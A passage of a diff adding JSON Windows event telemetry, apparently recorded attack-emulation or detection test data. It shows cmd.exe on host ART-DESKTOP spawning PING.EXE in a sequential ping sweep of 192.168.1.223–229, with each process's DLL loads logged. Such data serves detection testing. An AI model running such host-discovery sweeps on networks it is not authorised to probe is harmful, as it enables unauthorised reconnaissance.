"unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "process", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573081830000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.223", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 764, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": 
"{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "process", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573086830000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.224", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573086990000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + 
}, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "process", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573091990000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.225", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7928, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "process", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.226", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5520, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573097029984, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5520, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "process", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573101830000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.227", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6296, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "process", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573106990000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.228", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 728, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 
131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "process", + "pid": 728, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573111990000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.229", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6052, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": 